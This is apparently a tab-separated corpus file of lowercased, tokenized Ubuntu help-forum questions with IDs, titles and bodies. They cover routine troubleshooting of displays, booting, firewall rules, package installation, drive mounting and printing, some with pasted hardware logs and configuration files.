455487	trying to get 3 monitors on ubuntu 13 , max combined resolution is 4096x4096	i have a dell machine running ubuntu 13.10 ( i think ) , with a pcie video card with 256 mb of ram and a displaylink usb video card with 256 mb of ram . on the pcie card i have two monitors , both at 1600x1200 , and on the usb card i have a 1280x1024 monitor . the displaylink monitor is recognized , but i ca n't enable it . when i try to enable the monitor , i get these errors , one after the other : the selected configuration for displays could not be applied required virtual size does not fit available size : requested= ( 4480 , 1200 ) , minimum= ( 320 , 200 ) , maximum= ( 4096 , 4096 ) failed to apply configuration : % s gdbus.error : org.gtk.gdbus.unmappedgerror.quark._gnome_2drr_2derror_2dquark.code3 : required virtual size does not fit available size : requested= ( 4480 , 1200 ) , minimum= ( 320 , 200 ) , maximum= ( 4096 , 4096 ) from what i gather , ubuntu is treating the two display adapters as one , and the specs ca n't support a combined resolution of more than 4096x4096 . is there any way to increase the max combined resolution to what i need ? in case it matters i 'm using the gnome classic shell . if there are any solutions , could they be explained in a simple manner ? i 'm pretty new to ubuntu .
455490	ctrl+space mapping broken in vim after upgrade to 14.04	i recently upgraded to trusty via reformatting my system partition and keeping my home partition intact . everything has gone smoothly except my mapping of ctrl-space to escape in vim no longer works . the line in my vimrc is inoremap < c-space > < esc > and when i run ' : imap ' inside vim i see the mapping is there . but nothing happens when i try it . i 'm especially baffled because all other control assisted combinations see to work perfectly fine and i never had any issue with mapping space before the upgrade . any ideas ?
455492	fresh install of ubuntu 12.04 not booting	i just installed ubuntu 12.04 , before this i had ubuntu 13.04 . i have just deleted that and installed 12.04 . ubuntu 12.04 is not booting now because it ca n't find a boot device . i have run the boot repair but i still can not get it to boot . here is some more information from boot repair , click here .
455493	creating a live usb with minimal files at root ?	i want to have an edc flash drive with the option to boot ubuntu from it , but the default set up makes for a really messy root directory with all of the important files . any possible way i can reduce it to one or two folders and still boot easily ? thanks !
455495	firewall rule to drop dos attacks . what is wrong with my command ?	i have a script like that : maxreq='cat /var/log/maxreq_tmp' de=6 iptables -f iptables -i input -p tcp -m state -- state new -m recent -- set iptables -i input -p tcp -m state -- state new -m recent -- update -- seconds 60 -- hitcount $ ( $ maxreq ) -j drop iptables -i input -p tcp -m state -- state new -m recent -- set iptables -i input -p udp -m state -- state new -m recent -- update -- seconds 60 -- hitcount $ ( $ maxreq ) -j drop i want make firewall rule to drop dos requests , but it shows error : iptables : invalid argument . run `dmesg ' for more information . iptables : invalid argument . run `dmesg ' for more information . what is my command problem ?
455497	ubuntu os for on lenovo k900 smartphone	can i install ubuntu os for android on a lenovo k900 smartphone ? or how can a i create a kernel for make it native ?
455498	looking for only-tty iso image	i would like to know if there is a mini iso image that contains only the system , not the graphical environment . it just want the tty , like ttylinux ( but ubuntu kernel ) i am thinking that i do not need unity or other environments except the terminal . ( sometimes more than one virtual machines opened , are to heavy for old computers. ) thank you , geomint
455504	removing openvpn and all modifications	when starting up my server takes a long time . i already tried sudo apt-get remove openvpn but somewhere it 's still trying to setup openvpn . when i connect to the server i get all these internal vpn addresses : system load : 0.02 ip address for as0t3 : 5.5.3.1 usage of / : 13.5 % of 212.98gb ip address for as0t4 : 5.5.4.1 memory usage : 4 % ip address for as0t5 : 5.5.5.1 swap usage : 0 % ip address for as0t6 : 5.5.6.1 processes : 164 ip address for as0t7 : 5.5.7.1 users logged in : 0 ip address for as0t8 : 5.5.8.1 ip address for eth0 : my_ip_here ip address for as0t9 : 5.5.9.1 ip address for as0t0 : 5.5.0.1 ip address for as0t10 : 5.5.10.1 ip address for as0t1 : 5.5.1.1 ip address for as0t11 : 5.5.11.1 ip address for as0t2 : 5.5.2.1 when i check /etc/networking/interfaces it is empty . root @ ubuntu : ~ # ls -l /etc/openvpn total 12 drwxr-xr-x 2 root root 4096 mar 11 22:27 easy-rsa -rw-r -- r -- 1 root root 636 dec 6 18:35 static.key -rwxr-xr-x 1 root root 1357 feb 26 2013 update-resolv-conf root @ ubuntu : ~ # dpkg -l | grep vpn rc openvpn 2.2.1-8ubuntu1.2 virtual private network daemon ii openvpn-as 1.8.4-ubuntu10 openvpn-as
455505	how to share a folder in mac os x with ubuntu 12.04 guest user ?	sharing a folder with a mac os and ubuntu 12.04 is a total disaster . cd /mnt sudo mkdir /shares sudo mount -t vboxsf -o uid=1000 documents shares mount : protocol error on my mac my share folder is /users/ubuntu/documents
455506	ubuntu 13.10 can not recognizes hdmi	i 've a dell xps 15 with nvidia optimus tech , and after ubuntu upgrade it ca n't recognize my hdmi/displayport anymore . after connect my hdmi it just does n't appear in my display application . i know that nvidia property driver is not working completely properly with it , but before the upgrade i could use my second monitor just fine . lspci -v 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) subsystem : dell device 04b6 flags : bus master , fast devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=01 , subordinate=01 , sec-latency=0 i/o behind bridge : 00003000-00003fff memory behind bridge : f0000000-f10fffff prefetchable memory behind bridge : 00000000c0000000-00000000d1ffffff capabilities : [ 88 ] subsystem : intel corporation device 2010 capabilities : [ 80 ] power management version 3 capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ a0 ] express root port ( slot+ ) , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 140 ] root complex link kernel driver in use : pcieport 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 04b6 flags : bus master , fast devsel , latency 0 , irq 52 memory at f1400000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 4000 [ size=64 ] expansion rom at < unassigned > [ disabled ] capabilities : [ 90 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ d0 ] power management version 2 capabilities : [ a4 ] pci advanced features kernel driver in use : i915 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) subsystem : dell device 04b6 flags : bus master , fast devsel , latency 0 , irq 51 memory at f1c05000 ( 64-bit , non-prefetchable ) [ size=16 ] capabilities : [ 50 ] power management version 3 capabilities : [ 8c ] msi : enable+ count=1/1 maskable- 64bit+ kernel driver in use : mei_me 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 04b6 flags : bus master , medium devsel , latency 0 , irq 16 memory at f1c0a000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci-pci 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) subsystem : dell device 04b6 flags : bus master , fast devsel , latency 0 , irq 54 memory at f1c00000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 50 ] power management version 2 capabilities : [ 60 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express root complex integrated endpoint , msi 00 capabilities : [ 100 ] virtual channel capabilities : [ 130 ] root complex link kernel driver in use : snd_hda_intel 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=02 , subordinate=02 , sec-latency=0 capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : dell device 04b6 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport 00:1c.1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 2 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=03 , subordinate=03 , sec-latency=0 memory behind bridge : f1b00000-f1bfffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : dell device 04b6 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport 00:1c.3 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=04 , subordinate=04 , sec-latency=0 memory behind bridge : f1a00000-f1afffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : dell device 04b6 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport 00:1c.4 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 5 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=05 , subordinate=05 , sec-latency=0 memory behind bridge : f1900000-f19fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : dell device 04b6 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport 00:1c.5 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 6 ( rev b5 ) ( prog-if 00 [ normal decode ] ) flags : bus master , fast devsel , latency 0 bus : primary=00 , secondary=06 , subordinate=06 , sec-latency=0 i/o behind bridge : 00002000-00002fff prefetchable memory behind bridge : 00000000f1800000-00000000f18fffff capabilities : [ 40 ] express root port ( slot+ ) , msi 00 capabilities : [ 80 ] msi : enable- count=1/1 maskable- 64bit- capabilities : [ 90 ] subsystem : dell device 04b6 capabilities : [ a0 ] power management version 2 kernel driver in use : pcieport 00:1d.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 1 ( rev 05 ) ( prog-if 20 [ ehci ] ) subsystem : dell device 04b6 flags : bus master , medium devsel , latency 0 , irq 23 memory at f1c09000 ( 32-bit , non-prefetchable ) [ size=1k ] capabilities : [ 50 ] power management version 2 capabilities : [ 58 ] debug port : bar=1 offset=00a0 capabilities : [ 98 ] pci advanced features kernel driver in use : ehci-pci 00:1f.0 isa bridge : intel corporation hm67 express chipset family lpc controller ( rev 05 ) subsystem : dell device 04b6 flags : bus master , medium devsel , latency 0 capabilities : [ e0 ] vendor specific information : len=0c < ? > kernel driver in use : lpc_ich 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family 6 port sata ahci controller ( rev 05 ) ( prog-if 01 [ ahci 1.0 ] ) subsystem : dell device 04b6 flags : bus master , 66mhz , medium devsel , latency 0 , irq 49 i/o ports at 4088 [ size=8 ] i/o ports at 4094 [ size=4 ] i/o ports at 4080 [ size=8 ] i/o ports at 4090 [ size=4 ] i/o ports at 4060 [ size=32 ] memory at f1c08000 ( 32-bit , non-prefetchable ) [ size=2k ] capabilities : [ 80 ] msi : enable+ count=1/1 maskable- 64bit- capabilities : [ 70 ] power management version 3 capabilities : [ a8 ] sata hba v1.0 capabilities : [ b0 ] pci advanced features kernel driver in use : ahci 00:1f.3 smbus : intel corporation 6 series/c200 series chipset family smbus controller ( rev 05 ) subsystem : dell device 04b6 flags : medium devsel , irq 10 memory at f1c04000 ( 64-bit , non-prefetchable ) [ size=256 ] i/o ports at efa0 [ size=32 ] 01:00.0 vga compatible controller : nvidia corporation gf108m [ geforce gt 525m ] ( rev ff ) ( prog-if ff ) ! ! ! unknown header type 7f 03:00.0 network controller : intel corporation centrino wireless-n 1030 [ rainbow peak ] ( rev 34 ) subsystem : intel corporation centrino wireless-n 1030 bgn flags : bus master , fast devsel , latency 0 , irq 53 memory at f1b00000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ c8 ] power management version 3 capabilities : [ d0 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ e0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number ac-72-89-ff-ff-ca-25-fb kernel driver in use : iwlwifi 04:00.0 usb controller : nec corporation upd720200 usb 3.0 host controller ( rev 04 ) ( prog-if 30 [ xhci ] ) subsystem : dell device 04b6 flags : bus master , fast devsel , latency 0 , irq 19 memory at f1a00000 ( 64-bit , non-prefetchable ) [ size=8k ] capabilities : [ 50 ] power management version 3 capabilities : [ 70 ] msi : enable- count=1/8 maskable- 64bit+ capabilities : [ 90 ] msi-x : enable+ count=8 masked- capabilities : [ a0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] device serial number ff-ff-ff-ff-ff-ff-ff-ff capabilities : [ 150 ] latency tolerance reporting kernel driver in use : xhci_hcd 06:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168/8411 pci express gigabit ethernet controller ( rev 06 ) subsystem : dell device 04b6 flags : bus master , fast devsel , latency 0 , irq 50 i/o ports at 2000 [ size=256 ] memory at f1804000 ( 64-bit , prefetchable ) [ size=4k ] memory at f1800000 ( 64-bit , prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 50 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 70 ] express endpoint , msi 01 capabilities : [ b0 ] msi-x : enable- count=4 masked- capabilities : [ d0 ] vital product data capabilities : [ 100 ] advanced error reporting capabilities : [ 140 ] virtual channel capabilities : [ 160 ] device serial number 00-00-00-00-00-00-00-00 kernel driver in use : r8169 xranr screen 0 : minimum 8 x 8 , current 1920 x 1080 , maximum 32767 x 32767 lvds1 connected primary 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1920x1080 60.0*+ 59.9 1680x1050 60.0 59.9 1600x1024 60.2 1400x1050 60.0 1280x1024 60.0 1440x900 59.9 1280x960 60.0 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) xorg.conf generated using command : sudo xorg :1 -configure section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen1 '' screen 3 `` screen3 '' rightof `` screen2 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor3 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` kmsdev '' # < str > # option `` shadowfb '' # [ < bool > ] identifier `` card0 '' driver `` nvidia '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` accelmethod '' # < str > # option `` backlight '' # < str > # option `` dri '' # < str > # option `` colorkey '' # < i > # option `` videokey '' # < i > # option `` tiling '' # [ < bool > ] # option `` linearframebuffer '' # [ < bool > ] # option `` vsync '' # [ < bool > ] # option `` pageflip '' # [ < bool > ] # option `` swapbufferswait '' # [ < bool > ] # option `` triplebuffer '' # [ < bool > ] # option `` xvpreferoverlay '' # [ < bool > ] # option `` hotplug '' # [ < bool > ] # option `` reprobeoutputs '' # [ < bool > ] # option `` xvmc '' # [ < bool > ] # option `` zaphodheads '' # < str > # option `` virtualheads '' # < i > # option `` tearfree '' # [ < bool > ] # option `` percrtcpixmaps '' # [ < bool > ] # option `` fallbackdebug '' # [ < bool > ] # option `` debugflushbatches '' # [ < bool > ] # option `` debugflushcaches '' # [ < bool > ] # option `` debugwait '' # [ < bool > ] # option `` buffercache '' # [ < bool > ] identifier `` card1 '' driver `` intel '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card2 '' driver `` fbdev '' busid `` pci:0:2:0 '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card3 '' driver `` vesa '' busid `` pci:0:2:0 '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection section `` screen '' identifier `` screen3 '' device `` card3 '' monitor `` monitor3 '' subsection `` display '' viewport 0 0 depth 1 endsubsection subsection `` display '' viewport 0 0 depth 4 endsubsection subsection `` display '' viewport 0 0 depth 8 endsubsection subsection `` display '' viewport 0 0 depth 15 endsubsection subsection `` display '' viewport 0 0 depth 16 endsubsection subsection `` display '' viewport 0 0 depth 24 endsubsection endsection i 've spent some days trying to get it working but with no success . ps : i 've installed bumblebee and bumblebee-nvidia , otherwise my x did n't work . any thoughts ?
455508	battle.net keeps crashing on ubuntu 14.04	i ca n't seem to install anything from battle.net because every time i start up the application it crashes less than a minute after it opens . i 'm using the newest ubuntu release , and the latest wine build . any suggestions or ideas ? thanks .
455509	ubuntu 14.04 software updater crashes	i have a fresh install of ubuntu 14.04 and i tried to update it because i could not mount my sd-card while my external hdd worked but when i tried to open my software updater it crashed immediately . same happened with synaptic package manager and with the apt-get update command in the terminal . the terminal obviously did not crash but the same error was displayed . they all put out : systemerror ' > ( e : malformed line 56 in source list /etc/apt/sources.list ( dist parse ) )
455510	ubuntu install command-line only ?	i am trying to install ubuntu 14.4 on a computer ( actually into qemu emulator ) which does not use unity or any gui , and only a command line which looks like the `` terminal '' application in fullscreen . i checked out command line install only , but i do not want server features , just ubuntu desktop features without the desktop . how can i do this , or possibly is there a way to remove the `` server '' from ubuntu server ? edit : ubuntu server appears to be only available for 64-bit machines . i am planning to run it within qemu emulator on a 32-bit toshiba satellite machine running ubuntu desktop 14.4 .
455511	dual-boot ubuntu 14.04 and windows 7 on fakeraid installation error - question marks `` ? ? ? ? ... ''	i am trying to install ubuntu 14.04 on fakeraid along win7 . win 7 has been already installed , and dmraid is running . during the installation i choose to manually partition , this is the structure : \dev\mapper\isw_gchdghhd_volume0 \dev\mapper\isw_gchdghhd_volume0op1 - ntfs win7 loader \dev\mapper\isw_gchdghhd_volume0op2 - ntfs win7 partition \dev\mapper\isw_gchdghhd_volume0op3 - swap \dev\mapper\isw_gchdghhd_volume0op5 - ext4 mounted as \ \dev\mapper\isw_gchdghhd_volume0op6 -ext4 mounted as \home there is another sequence similar to above marked as `` liniar '' . i choose \dev\mapper\isw_gchdghhd_volume0 as boot device . when installation begins i get an error with question marks and it stops . sorry if my explanations are poor , its been written on my mobile .
455514	ubuntu 14.04 single install not booting mac pro 4.1	so this is what has happened so far ... i tried to install ubuntu 14.04 mac version and now the intel version on my mac pro 4.1 . installation succeeded each time yet when i restart the computer it does not find any os or live usb . pressing alt on startup shows me the live usb and nothing else . so what can i do now ?
455515	ubuntu 14.04 just update and very slow	so i just updated from ubuntu 13.10 to 14.04 , and i noticed that my system ( specifically animations and videos ) are very slow . i disabled the animations , which helped . but its still working very slow , especially with flash , silverlight and video . i checked my drivers all up to date . here are my specs : memory : 3.6 gib processor : amd phenom ( tm ) 9500 quad-core processor ă 4 graphics : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits ) ubuntu 64bit also something weird that happens sometimes is that my dash app does n't work properly . it disappears too quickly ( i suspect this has to do more with disabling my animations with unity tweak ) .
455516	touchpad not recognized on new ultrabook	i have a new samsung ativ book 9 2014 edition ( 930x5j-k01 ) and installed ubuntu 14.04 lts on it . the touchpad is not working at all . there is no cursor visible but an external usb mouse is working fine . after upgrading the kernel to 3.15 rc2 , an unknown input device is detected . but again , no mouse cursor appears . i tried many approaches to get the touchpad working , but nothing worked . using an older version of ubuntu , or another linux dirso does n't work too . i uploaded additional debugging information , where you can see the new detected input device ( atml3000 ) . windows detects the touchpad as hid\atml3000 & col01\5 & 1579c925 & 0 & 0000 output of cat /proc/bus/input/devices kernel 3.13 click here kernel 3.15 rc2 click here dmesg output : kernel 3.13 click here kernel 3.15 rc2 click here content of xorg.0.log kernel 3.13 click here kernel 3.15 click here output of sudo lshw kernel 3.13 click here kernel 3.15 rc2 click here i used hid replay to check that the device is actually working , to see the generated output during some gestures click here .
455519	how to stop alt from triggering global menu ?	i am trying to disable alt from triggering the global menu when i am using an application ( i am using ubuntu 14.04 ) . my problem is , when i am using emacs , for example , and i hit alt+h , the help menu is being launched , which i do n't want .
455521	i want to backup my entire ubuntu system	the following table illustrate my partition device boot start end blocks id system /dev/sda1 * 63 83891429 41945683+ 7 hpfs/ntfs/exfat /dev/sda2 83891491 625141759 270625134+ f w95 ext 'd ( lba ) /dev/sda5 83891493 264253184 90180846 7 hpfs/ntfs/exfat /dev/sda6 264253248 444614939 90180846 7 hpfs/ntfs/exfat /dev/sda7 444616704 446568447 975872 83 linux /dev/sda8 495398912 612583423 58592256 83 linux /dev/sda9 612585472 625141759 6278144 82 linux swap / solaris /dev/sda10 446570496 495396863 24413184 83 linux now , i want to backup my system just linux , can you show me how to fix it using dd command or another best ways ?
455523	error when trying to install spotify	i 'm trying to install spotify but i get this error first i added this to the source.list deb http : //repository.spotify.com stable non-free then i did this : sudo apt-key adv -- keyserver hkp : //keyserver.ubuntu.com:80 -- recv-keys 94558f5 sudo apt-get update and finally sudo apt-get install spotify-client also i just upgraded to 14.04 from 13.10 ...
455524	how to turn off dash history from previous searches in ubuntu 14.04 ?	due to this bug : i 'd like to have dash forget what i searched previously so future searches are not problematic . this would make unity more consistent with retrieving the items i am telling it to . is there any way to do this ? i tried to toggle off the `` history '' in system settings > > privacy , but it did nothing ...
455525	mounting a new hard drive	i installed a new hard drive that will be used for additional storage only . i have followed these instructions on ubuntu pages to partition it , but when i follow the instructions to automatically mount it , i get lost . it tells me to enter a new line in fstab but when i enter the line , there is no way to press enter and confirm . i also see it says something about using uuid but that link is no help either . the output of sudo fdisk -l : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 250.1 gb , 250059350016 bytes 255 heads , 63 sectors/track , 30401 cylinders , total 488397168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 488397167 244198583+ ee gpt disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00034d6c device boot start end blocks id system /dev/sdb1 2048 1953523711 976760832 83 linux sudo blkid : /dev/sda1 : uuid= '' 9edd-fadc '' type= '' vfat '' /dev/sda2 : uuid= '' f45d9121-db97-4b97-bdf1-6db2ceaaa3b6 '' type= '' ext4 '' /dev/sda3 : uuid= '' f908decc-66cd-41ec-a588-7df965077dea '' type= '' swap '' /dev/sdb1 : uuid= '' 4dfbef06-0f1a-4ec4-a637-0ea911e656ba '' type= '' ext4 '' cat etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda2 during installation uuid=f45d9121-db97-4b97-bdf1-6db2ceaaa3b6 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation uuid=9edd-fadc /boot/efi vfat defaults 0 1 # swap was on /dev/sda3 during installation uuid=f908decc-66cd-41ec-a588-7df965077dea none swap sw 0 0 uuid=4dfbef06-0f1a-4ec4-a637-0ea911e656ba /media/micah/new_hd ext4 defaults 0 2
455526	running executable file from terminal	i am new to ubuntu and currently i am trying to run executable files from the terminal but nothing is happening . when i am listing the files in the current directory i am obtaining the following : brandon @ ubuntu : ~/desktop/file_mapping/debug $ ls -l total 104 -rwxr-xr-x 1 brandon brandon 88481 apr 25 19:59 file_mapping -rw-r -- r -- 1 brandon brandon 1001 apr 26 00:00 makefile -rw-r -- r -- 1 brandon brandon 231 apr 24 18:58 objects.mk -rw-r -- r -- 1 brandon brandon 392 apr 26 00:00 sources.mk drwxr-xr-x 2 brandon brandon 4096 apr 25 19:59 src however when i am trying to run the file_mapping exec file , the following is obtained : brandon @ ubuntu : ~/desktop/file_mapping/debug $ ./file_mapping open : no such file or directory
455527	what 's the correct maas dhcp configuration ?	i 've set up a maas controller by following this documentation : http : //maas.ubuntu.com/docs1.4/cluster-configuration.html however , when i got to the dhcp configurations i was a little puzzled . the controller i created is at 172.16.142.61 . it looks like that 's the address for the `` ip '' text field . going down the rest of the list i 'm unsure of though . should i just put in the subnet/broadcast/router ( is that the gateway ? ) that the maas server resides in or am i suppost to just list the static address of the maas server and then define my own `` virtual '' subnet in the fields below ?
455528	firefox - why does alt+a select all text and not ctrl+a ?	since i am so used to using the standard ctrl+-a to select all , i am wondering why in firefox i have to use alt-a ? i just downloaded this plugin -- in the hope of solving this issue , but on opening the preferences for this add-on i see that the keyboard command is already set-up as ctrl-a . however that is not the case in reality . is this something deeper in ubuntu that needs changing ? i think there are some other programs , although i cant think of them of the top of my head that also use the alt-a to select all , although there are some that do n't . leaf pad for example uses the standard ctrl-a . i just upgraded to 14.04 , and was using 13.10 before that , in either case the problem is the exactly the same .
455529	ca n't open photos in picasa in ubuntu 12.04 ?	i have installed picasa using wine but i am not able to open any image using picasa as there is not any option of picasa in the list of applications which can be changed to default program for opening image files .
455530	some pdf documents are messy when printing	i have following problem , i 've got a pdf document that i need to be printed , but unfortunately , when entering printing preview all characters get messy and they do n't resemble original document 's content at all . the thing is , this is the only document with such issue i 've encountered so far . on windows , adobe reader renders and prints the document just fine . while i 've got this particular document printing problem solved , i 'd like to not have to encounter this ever again . i could n't find anything about this issue . here 's the document in question , click here .
455533	unity web app for bbc news no longer shows notifications since upgrade to 14.04	hi i 've just upgraded to ubuntu 14.04 64bit and i 've been accustomed to having the notifications for the bbc news web app come up but they have stopped since i upgraded . i use firefox for the web apps and when i navigated to the bbc news website it did ask if i wanted to install the web app and it did but when i search for it in dash and click on it it just opens a blank unity browser window and nothing else happens . also the icon for the web app is blank . i hope someone can help as i really want my notifications back !
455535	digital certificate .pdf file not openin in ubuntu 13.10 ?	i am using ubuntu 13.10 . digital certificate has been imported with user password . now when i open my .pdf file , it asks one more password and it 's not root pwd/digi certificate pwd . overall not able to open pdf in ubuntu .
